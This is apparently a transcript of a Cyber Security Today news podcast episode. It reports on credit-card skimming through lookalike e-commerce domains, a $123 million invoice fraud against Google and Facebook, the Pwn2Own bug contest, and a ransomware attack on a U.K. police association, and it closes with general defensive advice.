Fake name scams hit e-commerce companies, Facebook and Google, hackers earn big money for finding bugs and U.K. police hit by ransomware
Welcome to Cyber Security Today. It’s Friday March 22nd. I’m Howard Solomon, contributing reporter on cyber security for ITWorldCanda.com. To hear the podcast, click on the arrow below:
At the beginning of the week I told you about hackers compromising seven e-commerce web sites to skim off credit card information. Well, security vendor RiskIQ said Thursday it has discovered websites of two more online companies that have been hit: Bedding retailers MyPillow.com and Amerisleep.
One of the ways this scam works is by creating a fake web site with a similar name to the target company so customers don’t realize they’ve gone to a phony site when they enter their credit card information. In one case the attackers created the site “mypiltow.com”, hoping customers would miss the “LT” for the double-l in pillow.
A new tactic is intercepting the live chat support function on a website. Then they can skim off customer comments and possibly personal information and passwords.
(UPDATE: After this podcast was recorded RiskIQ clarified that the new tactic is including a code for a live chat support function on the fake website which would mimic the live chat capability users would expect to see on the real site. It also serves to hide the skimmer code the attacker added.)
The lesson is e-commerce companies have to do a better job at making sure the code on their web sites doesn’t change.
Speaking of similar name scams, ZDNet reports a Lithuanian man pleaded guilty in New York this week to defrauding Google and Facebook out of $123 million by using fake invoices to trick employees into wiring money him. He did it by setting up a company with a name similar to a computer supplier called Quanta that both Google and Facebook use. Then using that similar company name he emailed invoices to Google and Facebook, correctly betting accounting staff wouldn’t notice the slight difference. The man faces a maximum sentence of 30 years in prison.
There are criminal ways of earning money by hacking, and legitimate ways. One legit way is by participating in a bug hunting contest. One has been underway this week in Vancouver, British Columbia at the annual PwnToOwn (prounouned “POWN TO OWN”) contest organized by Trend Micro. On the first day a two-person team earned $160,000 of the $240,000 given out for finding holes in various pieces of software like the Safari browser. The prize pool for the three-day event is over $1 million. Contests like these help find bugs before criminals do, and help teach companies how to code better.
Finally, police in the U.K. have opened a criminal investigation into a ransomware attack that hit the computer systems and email service of the police association. The incident started over a week ago but word is only now getting out. Data on computers was encrypted. Unfortunately the attack also deleted crucial backup data. That’s usually a sign the backup system wasn’t properly isolated from the main network. Backups are an essential defence against ransomware. If your backup is connected all the time to your system, it’s going to be infected as well. The police association doesn’t think it was a targeted attack.
That’s it for Cyber Security Today. Links to details about these stories can be found in the text version of each podcast at ITWorldCanada.com. That’s where you’ll also find my news stories aimed at businesses and cyber security professionals. Cyber Security Today can be heard Mondays, Wednesdays and Fridays. Subscribe on Apple Podcasts, Google Podcasts or add us to your Flash Briefing on your smart speaker. Thanks for listening.